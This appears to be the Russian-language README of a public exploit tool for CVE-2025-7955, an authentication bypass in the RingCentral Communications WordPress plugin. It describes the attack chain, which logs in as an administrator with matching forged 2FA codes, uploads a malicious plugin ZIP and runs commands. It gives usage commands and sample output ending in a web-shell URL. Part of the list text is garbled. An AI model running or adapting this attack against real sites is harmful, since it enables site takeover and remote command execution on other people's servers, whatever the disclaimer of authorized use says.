
RingCentral Communications 1.5 - 1.6.8 - Отсутствие проверки на стороне сервера приводит к обходу аутентификации через функцию ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Отсутствие проверки на стороне сервера, приводящее к обходу аутентификации через функцию ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
Затронутый плагин: RingCentral Communications (WordPress)
Затронутые версии: 1.5 – 1.6.8
Оценка CVSS: 9.8 (Критический)
Тип: Обход аутентификации (отсутствие проверки на стороне сервера)
Плагин RingCentral Communications для WordPress уязвим к обходу аутентификации из-за некорректной проверки в функции
ringcentral_admin_login_2fa_verify(). Версии 1.5 – 1.6.8 позволяют неаутентифицированным злоумышленникам войти в систему как любой пользователь, просто указав одинаковые поддельные коды.
Этот эксплойт автоматизирует всю цепочку атак для CVE-2025-7955. Он предназначен для:
/wp-json/wp/v2/users/ID).whoami через шелл, и выводит результат.Подготовьте ваш вредоносный плагин
Убедитесь, что ваш ZIP-файл вредоносного плагина (по умолчанию: Nxploit.zip) находится в той же директории, что и скрипт.
Запустите эксплойт:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (обязательно) URL целевого сайта WordPress-user, --username : (необязательно) Имя пользователя для входа (будет обнаружено автоматически, если опущено)-id, --id_admin : (по умолчанию: 1) ID пользователя (администратор обычно имеет ID 1)-z, --zip : (по умолчанию: Nxploit.zip) Путь к ZIP-файлу вредоносного плагинаПример:
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Используется User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Попытка входа как: admin (ID: 1)
[+] Вход выполнен успешно!
[+] Nonce: 661e57f2e4
[*] Загрузка вредоносного плагина...
[+] Плагин успешно загружен!
[*] Выполнение: whoami
----------------------------------------
daemon
----------------------------------------
[+] Шелл: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.
Автор: Khaled Alenazi (Nxploited)
или с указанием имени пользователя/ID:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1